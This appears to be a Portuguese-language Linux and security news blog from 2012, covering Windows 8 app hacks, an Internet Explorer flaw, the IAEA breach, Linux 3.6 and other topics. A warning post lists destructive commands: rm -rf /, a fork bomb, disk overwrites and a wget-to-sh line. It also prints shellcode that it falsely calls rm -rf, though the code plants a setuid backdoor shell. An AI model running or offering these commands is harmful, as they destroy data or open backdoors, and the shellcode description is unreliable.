sábado, 15 de dezembro de 2012

Aplicativos para Windows 8 são fáceis de hackear

O Windows 8 oferece vários vetores que permitem a manipulação ou modificação de aplicativos, de acordo com Justin Angel. Em sua página pessoal (agora offline edisponível apenas em cache), ele descreve a facilidade de hackear esses aplicativos já que, segundo ele, os dados criptografados são armazenados localmente - juntamente com o algoritmo de criptografia e a chave de hash.

Angel usa diferentes aplicativos de jogo para demonstrar o que é possível fazer com esse conhecimento em mente. Usando 1dados armazenados localmente e ferramentas como dotPeek, o engenheiro afirma que é possível criar um “estoque de ouro” que, de outra forma, precisaria comprar com dinheiro real em um jogo. Angel simplesmente define o preço de compra dos itens para “0” em outro jogo e converte aplicativos de teste gratuito para versões completas que ele então acessa gratuitamente. Seus estudos se concentram em aplicativos que usam o Microsoft Intermediate Language (IL).

Angel também apresenta um hack para aplicativos, como o “Cut the Rope”, que aguarda uma resposta do servidor. O hacker aproveita o fato do Windows Internet Explorer 10 lhe permitir injetar código JavaScript; ele então usa essa brecha para enganar o software, fazendo se passar por seu criador, o que lhe permite aceder gratuitamente a níveis que, de outra forma, precisariam ser pagos.

O engenheiro disse que escolheu jogos para demonstrar as vulnerabilidades do sistema porque “os jogos representam a maior parte da receita dos desenvolvedores”. Embora os dados relativos ao desktop Windows 8 e sistemas operacionais para tablets ainda não tenham sido liberados, as estatísticas oficiais da Microsoft revelam, por exemplo, que 64% da receita de aplicativos para o sistema operacional do Windows Phone 7 é gerada a partir de downloads de jogos comerciais.
Angel também examina como esses problemas podem ser corrigidos. Por exemplo, ele observa que a disponibilidade de armazenamento criptografado do aplicativo que só pode ser acessada ​​por desenvolvedores poderia ajudar. Versões completas e de teste poderiam ser claramente separadas com a liberação destas últimas na forma de pacotes com recursos gerais limitados - e sem a opção para desbloquear a versão completa.

O engenheiro afirma que sua motivação não foi a de fornecer instruções para hacker apps. Pelo contrário, Angel destaca que ele próprio comprou os aplicativos que invadiu e recomenda que seus leitores façam o mesmo, porque “são incríveis”. Ele também observa que o seu empregador não tem nada a ver com seu artigo e que ele trabalhou com os hacks em seu tempo livre. Isto poderia soar um tanto controverso, já que, de acordo com informações acessíveis publicamente como em seu perfil no Twitter, Justin Angel é um engenheiro da Nokia que trabalha no desenvolvimento dos sistemas operacionais do Windows Phone 7 e 8. (Lembrando que a Microsoft e a Nokia trabalharam juntas para desenvolver o Windows Phone).
fonte: Linux magazine 

quinta-feira, 13 de dezembro de 2012

Falha no Internet Explorer deixa usuários vulneráveis

Conforme a empresa britânica Spider.io, uma falha no Internet Explorer  6 a 10 faz com que crackers possam gravar todos os movimentos do mouse. Assim, senhas e PINs podem ser capturados pelos cibercriminosos caso sejam digitadas em um teclado virtual.
De acordo com a empresa, sem citar nomes,  tal falha vem sendo explorada por duas redes de publicidade. "Enquanto a página com o anúncio contaminado estiver aberta - mesmo se você a coloca em segundo plano ou minimiza o Internet Explorer - o cursor do mouse pode ser rastreado por toda a sua tela inteira", diz comunicado da Spider.io.
A Spider.io disse também que a Microsoft Security Research Center já reconheceu o problema, porém, ainda não mencionou em corrigir a falha.
A empresa publicou os detalhes da falha do IE e também um jogo para demonstrar como pode ser usada para vigiar as atividades dos usuários.

sexta-feira, 30 de novembro de 2012

Hackers invadem agência de energia atômica da ONU

Um grupo de hackers invadiu os sistemas de computação da Agência Internacional de Energia Atômica (International Atomic Energy Agency - AIEA), copiou informações pessoais de contato de cientistas e as publicou no Pastebin. Em Viena, na terça-feira, um porta-voz da AIEA disse que os dados incluíam endereços de email de 150 cientistas internacionais que trabalham com a AIEA. Os dados aparentemente vieram de um servidor, desativado há algum tempo, por conta de preocupações sobre vulnerabilidades presentes no sistema. Um grupo autodenominado “Parastoo” reivindicou a responsabilidade pelo ataque quando publicou os dados no Pastebin no último domingo.

Em sua “primeira mensagem pública”, o grupo pediu aos cientistas que apoiassem uma investigação independente sobre o reator nuclear de Israel em Dimona. Sobre o reator há muito pesa a suspeita de produção de armas nucleares. O grupo questiona o papel da AIEA a respeito de Israel e de outros programas nucleares internacionais, cinicamente observando que a missão da AIEA para desempenhar seus “justos deveres humanitários internacionais” certamente poderiam envolver “stuxnetizar material nuclear”. A menção faz referência ao worm Stuxnet, que infectou computadores industriais, por exemplo, no site da divisão nuclear iraniana Bushehr.


O grupo também incluiu uma ameaça no pedido feito aos cientistas, prometendo que, se os ataques contra cientistas nucleares iranianos continuarem, informações ainda mais sensíveis das operações da AIEA serão publicadas na Internet. Os hackers disseram que não segurariam os dados “se um elemento ocidental favorecido diverte-se de moto atirando coquetel de bomba magnética em seus alvos”. Ao longo dos últimos anos, vários cientistas iranianos morreram em atentados terroristas. O governo de Teerã considera Israel e Estados Unidos responsáveis ??pelos ataques.

Gill Tudor, da AIEA, revelou que os dados foram “roubados de um servidor antigo que foi desativado há algum tempo” e pediu desculpas pelo vazamento de dados, acrescentando que o incidente está sendo investigado pelos especialistas em TI da Agência. De acordo com a agência de notícias dpa, outras fontes em Viena citaram que o ataque de hackers não parece ter sido realizado em nome de um governo: “foi feito de forma muito grosseira para isso”.

Fonte:linux magazine

quarta-feira, 21 de novembro de 2012

Linux Foundation luta por assinatura do Microsoft Secure Boot

Apesar de várias tentativas, James Bottomley, da Linux Foundation, não conseguiu fazer com que a Microsoft assinasse o mini bootloader de inicialização do Linux em sistemas com UEFI Secure Boot. Em um post em seu blog, o membro do Linux Foundation Technical Advisory Board (TAB) afirma que conseguiu com sucesso usar um sistema Linux para várias tarefas preparatórias de assinatura do bootloader, embora a Microsoft estipule que uma plataforma Windows específica deva ser utilizada para isso. No entanto, Bottomley disse que para fazer o upload do arquivo CAB contendo o bootloader, precisou usar uma máquina virtual com Windows 7, já que esta etapa requer Silverlight, sendo que a implementação Moonlight do Silverlight - de código aberto - simplesmente não funcionou.

James escreveu que, depois de ser carregado, o arquivo deveria concluir um processo de 7 etapas. Entretanto, o desenvolvedor relata que o processo parou na fase 6, e que questionou sobre as razões do problema seis dias depois. Aparentemente, a equipe de suporte da Microsoft respondeu que o arquivo não é um aplicativo Win32 válido, ao que Bottomley respondeu observando que, obviamente, não é um aplicativo Win32, pois é um binário UEFI de 64 bits - depois disso, não obteve mais nenhuma resposta. Ele relata que então começou um novo processo de assinatura, conseguindo chegar mais longe desta vez e finalmente recebendo um email com um bootloader assinado - porém no email uma nova surpresa: a mensagem dizia que o processo de assinatura havia falhado. Quando perguntada sobre isso, a equipe de suporte da Microsoft teria dito a Bottomley que ele não deve usar o arquivo entregue pois fora incorretamente assinado.
O desenvolvedor concluiu afirmando que “ainda espera que a Microsoft forneça à Linux Foundation um pre-bootloader com assinatura válida”, acrescentando que, “quando isto acontecer, o mesmo será enviado para o site da Linux Foundation para que todos possam utilizá-lo”.

Algumas semanas atrás, na conferência LinuxCon Europa 2012, Bottomley explicou em sua apresentação (slides aqui) por que nem o Consórcio UEFI nem a Linux Foundation, fabricantes do hardware ou de qualquer uma das distribuições Linux, haviam criado seu próprio certificado para assinar o bootloader, da mesma forma como a Microsoft faz com a VeriSign: aparentemente, a conta é simplesmente alta demais. De acordo com Bottomley, a Linux Foundation havia negociado com a VeriSign para criar um serviço de assinatura conjunta - ao que a VeriSign teria cobrado vários milhões de dólares para realizar o serviço. O desenvolvedor acrescentou ainda que a Linux Foundation também havia considerado iniciar sua própria autoridade de certificação, mas abandonou o plano por exigir um enorme esforço e custos muito elevados.

fonte: linux magazine

terça-feira, 20 de novembro de 2012

Especialistas em seguranca afirmam que roubar senhas do windows 8 é bem mais fácil.

Especialistas ja comecaram a encontrar falhas de seguranca do Windows 8. Eles descobriram que roubar as senhas do software é extremamente fácil.
O pessoal do Ars technica explicou onde esta a vulnerabilidade do sistema. De acordo com especialistas em seranca, que testaram os recursos do desenvolvedor
ainda no pré-lancamento do Windows 8, a criptografia que o sistema esta utilizando para armazenar senhas pode ser revertido.
Por meio de um procedimento simples hackers conseguem converter as senhas do usuarios em um arquivo de texto.Porém, os especialistas também afirmam que descobrir as senhas do sistema nao é o pior dos problemas, desde que voce nao possua nenhuma informacao importante desprotegida em sua máquina.
O pesquisador de seguranca, Adam Caudill, alerta para um fato muito importante : o descuido das pessoas com criacao de senhas ."O maior risco que eu vejo é a  probablidade de reutilizacao da senha, porque as pessoas sao muito ruins para escolher boas senhas, e elas tendem a reutiliza-las varias vezes", disse Adam.
Em resposta a isso, um porta-voz da Microsoft disse ao Softpedia que o Windows 8 é um ambiente muito seguro de trabalho e que nao armazena nenhuma senha em arquivos de texto.
"A Microsoft trata a privacidade e os dados de seus usuários como uma prioridade.Fazemos muitas coisas aqui, e como parte disso, é claro que nao armazenamos senhas em arquivos de texto simples. Além disso, fazemos grandes investimentos na prevencao contra hackers que possam acessar os seus dados", completou o porta-voz.

quarta-feira, 3 de outubro de 2012

Confira todas as novidades do novo kernel Linux 3.6


Tux

Confira todas as novidades do novo kernel Linux 3.6



Linus Torvalds publicou hoje a versão 3.6 do kernel Linux, após dez semanas de desenvolvimento. A nova versão, batizadade Terrified Chipmunk, oferece uma série de novos recursos para usuários finais, profissionais do sistema e administradores.

Gerenciamento de energia

novo recurso de Suspend to Both dará ao Linux 3.6 capacidade de entrar em modo standby híbrido. O Mac OS X e o Windows já oferecem esse recurso há algum tempo; ele envolve fazer com que o computador armazene o conteúdo de sua memória tanto na RAM como no disco do sistema durante a hibernação. Um sistema que hiberna dessa maneira deve acordar em questão de poucos segundos, como se estivesse acordando de um Suspend-to-RAM (ACPI S3); contudo, se a energia for terminada durante essa hibernação, por exemplo caso a bateria acabe, o sistema vai restaurar o conteúdo da memória a partir do disco como faria após um Suspend-to-Disc (Hibernate). Em um breve teste realizado em um sistema relativamente antigo, com um disco de 250GB, o Suspend-to-Both levou em torno de 16 segundos para suspender atividades -- quatro vezes mais demorado do que com o Suspend-to-RAM e o mesmo tempo necessário para um Suspend-to-Disk.
Essa versão do kernel Linux também podem colocar os dispositivos PCIe no estado de suspensão profunda "D3cold"; essa tecnologia é atualmente suportada por alguns computadores modernos e pode desligar completamente dispositivos PCIe individuais.

Sistemas de arquivos

O sistema de arquivo Btrfs, ainda em estágio experimental, agora suporta cotas para subvolumes (áreas separadas dentro de um sistema de arquivos), definindo quanto espaço elespodem ocupar. Outro novo recurso no Btrfs é o "enviar/receber" (send/receive). Isso permite que programas no userspace determinem a diferença entre dois instantâneos, salvar essas diferenças em um arquivo e restaurar esses backups quando necessário. Isso é particularmente útil para backups incrementais e atomizados. Uma explicação mais detalhada dessa função, que também está disponível no ZFS, podem ser encontradas em um artigo na LWN.net.
Uma das novas funções implementaradas no Linux 3.6 é baseada em uma ideia que data de 1996 -- o kernel pode ser agora configurado para não seguir hardlinks e softlinks em diretórios com um bit de configuração "sticky" (como o /tmp/), quando esses links apontam para algum ponto superior na árvore de diretórios. Conforme a LWN.net explica neste artigo, esse recurso, que pode ser ativado através do sysctl, põe um fim a um truque comum usado por invasores para escalar seus privilégios ao usar serviços operando em background como root.

Armazenamento

Uma nova interface permite que programas no espaço de usuário notifiquem o kernel quando o tamanho de uma partição que estejam usando muda, permitindo que o kernel seja informado de mudanças no tamanho de partições montadas ou outras durante a execução e agindo de acordo. O programa resizepart, que usará essa nova interface, foi incluído na recém-lançadaversão prévia do util-linux 2.22-rc2.
Mudanças no código do software RAID no subsistema MD deve melhorar o desempenho de conjuntos RAID em que um ou todos os dispositivos de armazenamento sejam SSDs. Os desenvolvedores do kernel agregaram o driver tcm_vhost, que está classificado como staging, mas não está vivendo no ramo de desenvolvimento staging do kernel. Ele permite que dispositivos SCSI em um sistema host para ser usado com um overhead mínimo por sistemas convidados usando KVM.

Virtualização

O KVM agora inclui diversas modificações que reduzem a carga de trabalho para manipulação de interrupções e portanto melhorando seu desempenho. Outro acréscimo ao kernel é o IOMMU Groups, que aprimora o isolamento de dispositivos PCI e PCIe usando tecnologias de virtualização de entrada e saída (I/O) como o AMD-Vi e VT-d da Intel. O recurso IOMMU Groups também é a base para o framework do driver de userspace VFIO (Virtual Function I/O); pensado principalmente para o KVM, esse recurso é usado para transpor dispositivos PCI e PCIe para máquinas convidadas, permitindo que acessem esses dispositivos com baixa latência e altos níveis de transmissão de dados, sem qualquer risco para o hospedeiro. Detalhes sobre o VFIO estão disponíveis na documentação e em um artigo da LWN.net. Extensões para oferecer VFIO através do QEMU ainda estão em desenvolvimento.

Redes

O recurso TCP Small Queues (TSQ) faz com que o Linux 3.6 use de pequenos buffers de até 128KB por saída de rede como padrão. Como diversas outras mudanças recentes no kernel, essa medida foi tomada para evitar o bufferbloat -- um termo usado para problemas como grandes latências de rede e conexões interrompidas causadas por excesso de buffering durante transferências de dados. De acordo com resultados de teste fornecidos pelos desenvolvedores responsáveis, os buffers menores por conexão não afetam a transmissão de dados; se necessário, administradores podem usar o arquivo/proc/sys/net/ipv4/tcp_limit_output_bytes para ajustar o valor do buffer durante a execução do sistema.
O kernel agora inclui suporte para cliente do TCP Fast Open (TFO), o suporte para servidores deve seguir com o Linux 3.7. O TFO é uma extensão experimental TCP que ainda não foi aprovada pela Internet Assigned Numbers Authority (IANA). Ela foi desenvolvida para reduzir o overhead quando estabelecendo uma conexão, que deve acelerar consideravelmente conexões HTTP.

Drivers

Desenvolvedores do Linux agregaram uma série de acréscimos e correções no Linux 3.6 destinadas a melhorar o suporte aos laptops Apple MacBook que foram lançados em juhlo (como o MacBook Pro Retina). Porém, nem todo o necessário para os novos MacBooks foi acrescentado ao novo kernel. Além disso, em alguns modelos, essa versão ainda exibe problemas durante a inicialização ou no uso do hardware gráfico.
O driver gráfico Radeon agora ativa os modos mais rápidos de transferência do PCIe 2.0, quando eles são suportados pelo hardware. Os drivers de áudio agora suportam oprocessadores Haswell da Intel e as plataformas de hubs controladores (platform controller hubs, ou PCHs) Lynx Point, que a Intel planeja lançar no próximo ano. Um driver para o teclado com trackpoint USB do ThinkPad, da Lenovo, foi integrado ao subsistema input. O driver bnx2x, que lida com diversos chips Ethernet da Broadcom, agora suporta o padrão Energy-Efficient Ethernet (EEE) que é especificado no documento IEEE 802.3az. Usuários podem elr ou definir parâmetros EEE através do recém-lançado ethtool 3.5.

Sumário

O kernel tem avançado consideravelmente em todos os campos de tecnologia. O Btrfs já deu um grande passo à frente, e o suporte à suspensão híbrida é um recursos há muito aguardado. Além disso, vimos uma alteração que encerrou um popular vetor de ataque à segurança do Linux.
No total o kernel já soma 15.868.036 linhas de código, num total de 39.733 arquivos. Seu código-fonte pode ser baixado diretamente do site kernel.org e em breve estará disponível eminúmeros servidores que espelham o site. A autenticidade do arquivo baixado pode ser verificado com um arquivo de assinatura que também está disponível.


domingo, 16 de setembro de 2012

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

Os 7 comandos mais perigosos do mundo Linux [CUIDADO]

 
Os 7 comandos mais perigosos do mundo Linux [CUIDADO]
É muito normal lermos diversos tutoriais em busca de uma informação e sair digitando todos os comandos que quem o escreveu mandou. É camarada, muita calma nessa hora.
Infelizmente, existem muitos malintencionados por aí que, dentro de um tutorial sério ou no comentário do mesmo, postam certos comandos para que usuários inexperientes se deem mal. Tome muito cuidado com os sites que você visita em busca de informação.
Esta lista abaixo representa os 7 comandos mais perigosos do mundo Linux. São comandos que você NUNCA DEVE EXECUTAR!
Lembre-se: o terminal é uma ferramenta poderosíssima, porém é preciso muito conhecimento para saber usá-lo.
Primeiro comando:
rm-rf /    (com privilégios de root usando o “sudo” ou logado como root)
Este comando irá apagar todo o seu sistema!

Segundo comando:
É o mesmo do comando acima, porém escrito em código hexadecimal.
  • char esp[] __attribute__ ((section(“.text”))) /* e.s.p
  • release */
  • = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
  • “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
  • “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
  • “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
  • “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
  • “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
  • “\x6e\x2f\x73\x68\x00\x2d\x63\x00″
  • “cp -p /bin/sh /tmp/.beyond; chmod 4755
  • /tmp/.beyond;”;

Terceiro comando:
mkfs.ext3 /dev/sda
Este comando irá formatar o seu dispositivo /dev/sda e, claro, irá apagar todos os arquivos contidos nele.

Quarto comando:
|:(){:|:&};:
Conhecido como “Fork Bomb”, ele irá executar inúmeros processos em seu sistema, fazendo com que o seu computador trave na hora!

Quinto comando:
qualquer_comando > /dev/sda
Ele irá escrever a saída do comando executado (qualquer) em /dev/sda, apagando todo o conteúdo preexistente .

sexto comando::
wget http://uma_url_qualquer -O- | sh
O comando wget realiza downloads. Porém, existe no fim da linha um “|”, que funciona como redirecionador. Ou seja, ao término do download, ele executará o arquivo baixado. Se o arquivo não for um shell script, ok. Porém se for, ele executará automaticamente na sua máquina, o que é um prato cheio pra fazer um usuário desavisado se dar mal.

setimo comando:
mv /home/username/* /dev/null
Irá mover diretório home para um lugar que realmente não existe. Em outras palavras, ele irá apagar seu diretório home.

Os comandos listados acima são prejudiciais se executados da forma que exemplificamos. Um exemplo: o sétimo comando prejudicial começa com o comando “mv”, que é responsável por mover arquivos entre diretórios. Ele sozinho não é prejudicial, pelo contrário, é essencial. O problema é usá-lo para “mover a sua home para /dev/null”, que é conhecido como o “buraco negro do Linux”
fonte Blog seja livre

domingo, 2 de setembro de 2012

Como evitar que os usuários alterem suas senhas no linux


Uma das características de segurança mais importantes usados ​​hoje são senhas. Nesta seção, eu vou compartilhar uma dica simples sobre a forma de impedir que seus usuários alterem suas senhas.

Normalmente / usr / bin / passwd tem a seguinte permissão SUID:

# Ls-l / usr / bin / passwd

-rs-x-x 1 root root 17890 9 de maio de 2012 / usr / bin / passwd


Aqui, o valor numérico da permissão de arquivo será 4411.

Quando um arquivo SUID é executado, o processo que corre é concedido o acesso aos recursos do sistema com base no usuário que é dono do arquivo e não o usuário que criou o processo.

Então, agora temos que remover o SUID para o comando, para que os usuários normais não tenha privilégios de atualizar o arquivo:

# Chmod u-s / usr / bin / passwd

ou

# Chmod 511 / usr / bin / passwd

É isso, agora os usuários não podem alterar suas senhas padrão .

traduzido de linux server world.

sábado, 25 de agosto de 2012

ISCSI gerenciamento de armazenamento - Um protocolo de armazenamento de Area Network

O protocolo iSCSI é uma rede  de armazenamento (SAN)  de protocolo que permite iniciadores iSCSI usar dispositivos de armazenamento no destino iSCSI (remoto) utilizando cabos ethernet normal. Para o iniciador iSCSI, o armazenamento remoto parece um disco rígido conectado localmente.

O que é iSCSI?
É um protocolo de rede de armazenamento acima de TCP / IP. Este protocolo encapsula SCSI de dados em pacotes TCP. iSCSI nos permite conectar um host para uma matriz de armazenamento através de uma conexão Ethernet simples (unidade de fita). Esta solução é mais barata do que a Fibre Channel SAN (Fibre Channel HBAs e switches são caros). Do ponto de vista anfitrião o usuário vê a matriz de armazenamento.
 

LUN
LUNs como um disco local. dispositivos iSCSI não deve ser confundida com dispositivos NAS (por exemplo NFS). A diferença mais importante é que os volumes NFS pode ser acessado por vários hosts, mas um volume iSCSI pode ser acessado por um host. É semelhante ao SCSIi protocolo: geralmente apenas um host tem acesso a um disco SCSI (a diferença é o ambiente de cluster). O protocolo iSCSI é definido no documento RFC3720 pelo IETF (Internet Engineering Task Force).

Alguns críticos disseram que a iSCSI tem um pior desempenho em comparação com Fibre Channel e causa alta carga de CPU nas máquinas hospedeiras. Eu acho que se nós usamos Gigabit Ethernet, a velocidade pode ser suficiente. Para superar a alta carga de CPU, alguns fornecedores desenvolveram o iSCSI TOE-s (TCP Offload Engine). Isso significa que o cartão foi construído em um chip de rede, que cria e calcula a quadros tcp. O kernel do Linux não suporta diretamente este e os fornecedores de cartão de escrever seus próprios drivers para o sistema operacional.

iniciador
O iniciador é o nome do cliente iSCSI. O cliente iSCSI tem um acesso de nível de bloco para o alvo iSCSI. Um cliente pode usar múltiplos alvos iSCSI.

alvo
O alvo é o nome do servidor iSCSI.

descoberta
Descoberta é o processo que mostra as metas para o iniciador.


traduzido de Linux server world

domingo, 22 de julho de 2012

Mozilla disponibiliza suas primeiras compilações do Firefox OS

Compilações noturnas do sistema operacional em código aberto Firefox OS da Mozilla, destinado a dispositivos móveis, já estão disponíveis para download no servidor FTP do projeto. Essas primeiras compilações, nomeadas como b2g-17.0a1, são destinadas a desenvolvedores e podem ser executadas em sistemas desktop para testes. Com compilações prontas para Windows, Mac OS X e Linux (com código-fonte também fornecido), os desenvolvedores podem experimentar o sistema, criar e testar aplicativos; a equipe de engenharia para lançamentos da Mozilla espera que usuários vão também relatar quaisquer falhas que encontrarem.
A plataforma Firefox OS -- divulgada pela primeira vez em 2011 como Boot to Gecko (B2G) -- é a proposta de sistema operacional para dispositivos móveis da organização sem fins lucrativos. Completamente centrado no navegador web, a arquitetura do sistema, que opera sobre um kernel Linux, foi desenvolvida para eliminar a necessidade de aplicativos serem desenvolvidos usando APIs específicas das plataformas. Ao invés disso, os desenvolvedores podem criar novos aplicativos usando padrões abertos, como o HTML5.
Os recursos do telefone são implementados como aplicativos web armazenados localmente, removendo toda necessidade de código nativo e camadas de middleware do dispositivos. Quaisquer APIs necessárias para explorar todos os recursos do telefone, como câmera, Bluetooth, USB e NFC, são implementadas como APIs Web e submetidas à W3C "para padronização".
Uma série de fabricantes de dispositivos, incluindo a TCL Communication Technology e a ZTE, já se comprometeram a construir aparelhos baseados no processador Snapdragon da Qualcomm usando o sistema operacional da Mozilla; os primeiros aparelhos com o Firefox OS devem chegar ao mercado brasileiro no começo de 2013.
Mais detalhes sobre essas compilações diárias podem ser encontradas em uma entrada no blog pessoal de Tony Chung, da Mozilla; instruções para compilar a executar o b2g são fornecidas na página Gaia/Hacking da MozillaWiki.

sexta-feira, 20 de julho de 2012

Brasileiros se preocupam com segurança na web

Pesquisa revela que 73% dos usuários têm cuidado ao publicar algo no Facebook, mas têm menos receio em compartilhar dados

Os brasileiros têm se preocupado cada vez mais com sua segurança ao navegar pela web ou postar conteúdo nas redes sociais, principalmente no Facebook. Mas, segundo uma pesquisa recente, que entrevistou 784 pessoas sobre seus hábitos online, a falta de alguns cuidados demonstra que muitos usuários ainda estão expostos a riscos na internet.

A quantidade de brasileiros que diz ter um perfil privado no Facebook (visível apenas para amigos) é menor, por exemplo, do que nos Estados Unidos. Segundo a pesquisa, realizada pela Hi-Mídia e pela M.Sense (especializadas no mercado digital), 45% dos entrevistados possuem um perfil privado. Nos Estados Unidos, 59% dos usuários dizem ter perfis privados, de acordo com estudo semelhante do instituto Pew Research Center.

O brasileiro também é menos receoso ao compartilhar informações, principalmente fotos — postadas por 63% dos usuários. Mais de um terço dos entrevistados (35%) dizem publicar informações pessoais sobre seus gostos e interesses, 29% postam vídeos e 14% atualizam sua localização através de check-in.

“A pesquisa aponta que os usuários se preocupam com a segurança das informações pessoais e a reputação nas redes sociais. Se comparado o comportamento no Facebook entre brasileiros e americanos, percebe-se que os internautas dos EUA possuem maior grau de preocupação com a privacidade”, afirma Bruno Maletta, sócio-diretor da M. Sense.

Reputação. Há também por parte dos brasileiros um cuidado com a maneira pela qual são vistos nas redes sociais, ainda que inferior aos percentuais encontrados em pesquisas norte-americanas. No Brasil, 21% dos usuários já se desmarcaram de fotos, contra 37% nos Estados Unidos (segundo pesquisa da Pew Research Center). Entre os brasileiros, 38% já excluíram alguém da lista de amigos, contra 63% de americanos. Quanto a apagar comentários postados, o percentual é igual nos dois países: 45% dos usuários.

De acordo com a pesquisa, 73% dos entrevistados não aceitam convites de amizade de desconhecidos e têm cuidado com o que escrevem e compartilham, o que pode justificar o fato de que 23% já terem se arrependido de algo que publicaram ou compartilharam.

Já em relação à segurança no próprio Facebook , 46% dos usuários acreditam que a rede social segue rigorosamente todas as suas normas de privacidade, enquanto 41% deles afirmam não confiar completamente na política da rede de Zuckerberg.

“A sensação de insegurança e falta de privacidade podem influenciar no relacionamento dos consumidores com as empresas nas redes sociais. As ações de publicidade, ativação, venda e relacionamento devem observar algumas regras para não terem o resultado comprometido pela desconfiança dos consumidores”, diz Maletta.

Em relação à web em geral, a pesquisa indica ainda que, para se proteger, 87% dos entrevistados mantém o antivírus atualizado, 79% tomam cuidado com os sites acessados, 78% não abrem e-mails de desconhecidos e 77% realizam compras somente em lojas online confiáveis.

sexta-feira, 13 de julho de 2012

Oracle vai liberar 88 correções de segurança na terça-feira 17/7

Patche para a família Fusion Middleware foi considerado o mais crítico. Empresa aconselha que clientes apliquem as alterações o quanto antes.

A Oracle planeja liberar 88 correções de segurança na próxima terça-feira (17/7) para uma variedade de produtos, de acordo com um anúncio publicado no site da companhia.

Segundo a empresa, um número de falhas pode afetar mais de um produto e os clientes devem aplicar os patches logo que possível.

Quatro correções são direcionadas para o banco de dados Oracle e três das vulnerabilidades na base de dados podem ser exploradas por meio de uma rede sem a necessidade de credenciais de login, de acordo com o aviso da empresa. A Oracle também deverá liberar 22 correções para sua família Fusion Middleware, oito das quais podem ser remotamente exploradas sem um nome de usuário ou senha, alerta.

A fabricante utiliza o Common Vulnerability Scoring System (CVSS) para classificar a gravidade de seus patches e uma das correções para o Fusion Middleware foi classificada pelo CVSS com a pontuação 10,0, a mais alta na escala. Outras 25 correções vão cobrir deficiências em produtos da família de produtos Oracle Sun, incluindo a aplicação para servidor GlassFish e o sistema operacional Solaris.

O lote de atualizações vai incluir ainda seis correções para o banco de dados MySQL. Hyperion, Enterprise Manager Grid Control, E-Business Suite, Siebel CRM, PeopleSoft e Oracle Industry Applications também foram incluídos no pacote.

A cada trimestre, a Oracle divulga correções para seus aplicativos, middleware e software de infraestrutura e o último conjunto, emitido em abril, incluiu também 88 correções de bugs. Segundo a Oracle, são liberados, periodicamente, patches para a linguagem de programação Java SE, mas em data diferente do que a dos outros produtos.

quinta-feira, 5 de julho de 2012

Irã promete bloquear a Internet em agosto

Reza Taghipour, ministro da Comunicação no Irã, anunciou oficilamente que a Internet no país será fechada em cinco meses. Com o intuito de tornar a web “mais limpa”, o político pretende cancelar o acesso à grande rede no Irã, permitindo apenas que a população visite uma intranet nacional, que deve ficar pronta até agosto deste ano.
Reza Taghipour quer banir a Internet no Irã (Foto: Divulgação) (Foto: Reza Taghipour quer banir a Internet no Irã (Foto: Divulgação))Reza Taghipour quer banir a Internet no Irã
(Foto: Divulgação)
O projeto irá bloquear sites de gigantes da Internet como GoogleHotmail e Yahoo, que serão substituídos por serviços que administrados pelo próprio governo do país, como o Iran Mail e o Iran Search Engine, de acordo com informações do jornal “International Business Times”. O Irã já começou um processo de registro que vai catalogar os interessados em participar do projeto, e fez uma espécie de lista de espera.
Este tipo de censura é novo, mas as restrições à Internet no país já existem há algum tempo. No início deste ano, o governo do Irã, por diversas vezes, cortou o acesso à rede nas casas, e mais recentemente bloqueou o acesso às páginas criptografadas que não fossem do país. Diversos internautas iranianos utilizam servidores de proxy para conseguir burlar estes bloqueios e acessar sites que são proibidos, como o Facebook e o Twitter.
O ministro Taghipour revelou a uma agência de notícias local, em janeiro, que estava cogitando a possibilidade de instalar uma Internet com um firewall nacional. Obviamente, a decisão de se estabelecer esta “intranet” já preocupa os ativistas do país, que estariam organizando protestos.

Se você gosta da Internet? Então tem até amanhã (06/07) pra defendê-la

Muito temos falado a respeito de leis e tratados que querem “regular” a rede mundial de computadores. No último ano, diversos países tentaram colocar a internet sob as rédias de leis, estatutos e tratados, muitas vezes até ditatoriais, que vão totalmente contra os princípios de Liberdade e Privacidade.
Alguns países como o Irã e a Coréia do Norte, talvez por serem conservadoristas e terem governos “extremistas”, já implementaram leis para “controlar” a internet, ou em outras palavras, controlar o que os intenautas destes países fazem ou deixam de fazer.
No Brasil algumas tentativas, como a do Senador Eduardo Azeredo, criador do Projeto de Lei 84/99, conhecido como “AI-5 digital” ou “mordaça digital”, e o PL336, conhecido como “SOPA brasileira”, criado pelo deputado Walter Feldman, vieram (e estão vindo) pra tentar impor regras e limites a Internet no Brasil. Regras estas que vão desde a “proteção” de propriedades intelectuais até arquivamento e análise de logs de acessos dos usuários, por parte dos provedores de internet.
Com o intuito de frear estas tentativas de legislação infundada, foi criado ainda em 2011 por meio de uma parceria entre o Ministério da Justiça e a Escola de Direito da Fundação Getúlio Vargas, um Marco Civil da Internet brasileira. Seu texto está sendo definido colaborativamente, e em uma plataforma aberta, colhendo opiniões de juristas, entidades ligadas à rede, empresas e governo, além de usuários comuns.
Os pontos ali representados serão um “norte” para o julgamento de processos jurídicos ligados à rede. A maioria dos seus artigos vão no sentido de proteger o usuário e limitar ações abusivas de empresas de tecnologia e provedores, e todo seu conteúdo, incluindo um fórum de discussões online, que está disponível no site edemocracia.camara.gov.br.
Você pode acessar o relatório do Marco Civil da Internet neste endereço (que é uma súmula de tudo que já foi debatido até agora) e dar a sua opinião sobre o assunto. Na verdade é imprescindível que você participe deste ato público, que se encerrará amanhã (06/07), pois o relator do Projeto,Deputado Alessandro Molon, pretende levá-lo a votação na câmara na próxima semana.
Não deixe que corruptos, que só querem saber de usurpar o dinheiro público pessoas que não entendem do assunto votem a respeito do que é nosso por direito: a Internet.
Faça a sua voz ser ouvida. Brigue pelo seu direito a privacidade e pela sua liberdade. Seja, e continue sendo Livre.

quarta-feira, 4 de julho de 2012

Cursos gratis.

Aprimore-se e tenha o mercado de trabalho aos seus pés, com excelentes cursos de Linux, Mikrotik, e hacking.
Escolha onde voce deseja trabalhar podendo ser ate a partir da sua casa.
Se voce deseja ser a diferença e começar hoje mesmo, nos entramos com  o apoio e voce com a força de vontade e o querer em apreender.
Curso de Linux gratis.

Faxina Geral no Google


Google termina com iGoogle e mais 4 serviços
